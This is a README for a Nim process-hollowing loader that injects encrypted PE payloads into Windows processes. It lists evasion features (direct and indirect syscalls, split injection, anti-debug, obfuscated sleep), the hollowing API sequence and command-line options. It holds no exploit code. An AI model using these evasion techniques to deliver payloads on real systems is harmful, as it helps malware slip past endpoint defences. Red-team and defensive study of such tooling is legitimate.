--== Process hollowing loader written in Nim for PEs only ==--
I built PichichiH0ll0wer to learn and contribute, sure. but also because I'm quite tired of shellcodes everywhere. Loading PEs might be less evasive, I know, but it's still efficient and more convenient than fighting to turn your PE payload into a shellcode each time (which not always works smoothly). Also, PichichiH0ll0wer has some features to protect your payload. Supports only x64 EXEs.
- Configurable builder
- Payload encrypted and compressed (and optionally splitted) in the hollow loader
- Supports splitted injection using multiple processes
- Supports direct and indirect system calls
- Hollower does not use the very suspicious call Nt/ZwUnmapViewOfSection
- Can build EXE / DLL hollow loaders
- Can block unsigned microsoft DLLs from being loaded to the hollowed process
- Supports anti-debug techniques with the ability to die or to execute useless calculations ('troll' mode)
- Obfuscated sleep using useless calculations
- Supports execution within VEH
- Supports command line Rc4 key to decrypt the payload
- Simple hollowing: just the usual stuff: VirtualAlloc -> WriteProcessMemory -> GetThreadContext -> SetThreadContext -> ResumeThread.
- Direct syscalls hollowing: using the great NimlineWhispers2.
- Indirect syscalls hollowing: using the great NimlineWhispers3.
- Splitted hollowing: each step of method (1) is occurring in a separate process with inherited handles.
- Splitted hollowing: each step of method (2) is occurring in a separate process with inherited handles.
- Splitted hollowing: each step of method (3) is occurring in a separate process with inherited handles.
Example of splitted hollowing of cscript.exe
with cmd.exe
that spawns whoami.exe
:
Built with Nim 1.6.12, should be run on Windows only.
nimble install winim ptr_math nimprotect supersnappy argparse
Usage:
[options] exe_file injection_method
Arguments:
exe_file Exe file to load
injection_method Injection method
1 - Simple hollowing
2 - Direct syscalls hollowing
3 - Indirect syscalls hollowing
4 - Splitted hollowing using multiple processes
5 - Splitted hollowing using multiple processes and direct syscalls
6 - Splitted hollowing using multiple processes and indirect syscalls
Options:
-h, --help
-s, --sponsor=SPONSOR Sponsor path to hollow (default: self hollowing)
-a, --args=ARGS Command line arguments to append to the hollowed process
-f, --format=FORMAT PE hollower format Possible values: [exe, dll] (default: exe)
-e, --export=EXPORT DLL export name (relevant only for Dll format) (default: DllRegisterServer)
-b, --block Block unsigned Microsoft Dlls in the hollowed process
-p, --split Split and hide the payload blob in hollower (takes long to compile!)
-t, --sleep=SLEEP Number of seconds to sleep before hollowing (default: 0)
-g, --anti-debug=ANTI_DEBUG
Action to perform upon debugger detection Possible values: [none, die, troll] (default: none)
-k, --key=KEY RC4 key to [en/de]crypt the payload (supplied as a command line argument to the hollower)
-v, --veh Hollow will occur within VEH
-d, --debug Compile as debug instead of release (loader is verbose)
Also, check the examples.